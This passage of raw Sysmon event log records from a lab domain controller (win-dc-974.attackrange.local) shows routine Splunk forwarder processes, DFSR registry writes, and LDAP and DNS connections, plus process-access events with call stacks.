Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.093{05ADC7E1-6DDF-603E-E5AA-00000000AD01}8372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:55.067{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=625F7D01146CF13F7C082F2D7957D4C3,SHA256=A1B7917A4CC81903A6F7A0B1EB787A01B131D8A4CEE67C1F3E64DE2A1A85A34C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:56.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=045C0D8CD8B5DEFB94EC93A780046BF5,SHA256=31EBFF8A99217A4F51C2A4915D3227E227502F60DBC9EA636A931BED9AC80AA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:56.092{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F00F46F0CEB9CA97F954D19655480BD,SHA256=FF4E633697489E9FFF12851B66AFBB0C071FDFC31F3CCF4654D2CE222C94667A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:57.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A6631D33C991C4AA23CD2ADE5CE9FF1,SHA256=67655779EF0EEDAC5611F5040FC87189C3FFA2C9A92320EDED54DFDA63FA39F9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002243496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:54:58.748{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\20FED10E-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_20FED10E-0000-0000-0000-100000000000.XML 13241300x80000000000000002243495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:54:58.733{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2C259B24-678C-4AA8-B113-78B3B7CC4387\Config SourceDWORD (0x00000001) 13241300x80000000000000002243494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:54:58.733{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2C259B24-678C-4AA8-B113-78B3B7CC4387\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2C259B24-678C-4AA8-B113-78B3B7CC4387.XML 23542300x80000000000000002243493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:58.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1317BC89403D3D58C974692066329764,SHA256=DDEC5F31764C31F1A343FE6BCB101FAF2FE84B46663A1EDF637332FFDEBC9B31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:58.175{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A1297AE0F2EA526DEEDEF14958589A,SHA256=AFB23AFBAE4F375C203A205FC33B406D02FC9ED79B68560D0C9C9D606C851546,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.900{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60162-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002243503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.900{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60162-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002243502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.882{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60161-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local135epmap 354300x80000000000000002243501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.882{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60161-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local135epmap 354300x80000000000000002243500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.849{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local54929- 23542300x80000000000000002243499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:59.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30AC2B596FFDC1D71C5FB8622E28FCAE,SHA256=565E02F6522B48609A89CB3D3F64BC7B9F3BFD16C8CD49786ED06808E61F5B52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:59.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C1AD6B40E69C81CC7596329AA01F073,SHA256=7F875946C0DFAE83B46ABF4BD5A8F962EA1F601CF9044F555676A44996FEECA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:48.412{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60160-false10.0.1.12-8000- 23542300x80000000000000002243508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:00.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7D6547AB00927DCE77F0F2041577E1B,SHA256=61D1B8D5EDA9222024F77D992E290F0B751137B90AE40368954C88DC3EB755F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:00.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A63FBBDF54480ABF636AEE7B67DDD01D,SHA256=52D5A1DF5D59480577EF3D666458CF1C968367E2B70FB6B722AB236C9A850044,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.907{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60163-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002243505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.907{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60163-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 23542300x80000000000000002243510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:01.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8B42248E19E021B614C5C1285F49CFA,SHA256=5342A2541BAAC65A9929D6F130D86FD9E2D7DEFFD9602AB37368BDFE1013941D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:50.864{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54929- 23542300x80000000000000002243513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:02.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B459D5D575B0E8F822F58B2AFDB83D2,SHA256=B862E0B2EBE4FA8F4E65F76982F6E1332359782409E82FBC5D1B424061869264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:02.269{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=845FF510029343E7092BD709E8F4F88C,SHA256=899E94DB24DE8580C92552CDD6A997FA741E6691D557ACA4F7FFF8FB2574575E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:51.416{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56577- 10341000x80000000000000002243534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.775{05ADC7E1-6DE7-603E-E8AA-00000000AD01}1104812008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.773{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90F7A6EB8D5D88A195A9C912B5AABCE2,SHA256=1E9740644C41CF10B111EAEDA9D55982E861A919F95315270FC333B9DD99A94D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DE7-603E-E8AA-00000000AD01}11048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DE7-603E-E8AA-00000000AD01}11048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.592{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DE7-603E-E8AA-00000000AD01}11048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.594{05ADC7E1-6DE7-603E-E8AA-00000000AD01}11048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3487B1FF3D10D1ECB36CFC00FD5B85,SHA256=9330E1D7F3A8B3E1AF0F8164FF733F2CFE94D80363C0D36C4B291005E957DFF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:52.442{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56577- 10341000x80000000000000002243522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.201{05ADC7E1-6DE7-603E-E7AA-00000000AD01}114926796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.014{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DE7-603E-E7AA-00000000AD01}11492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 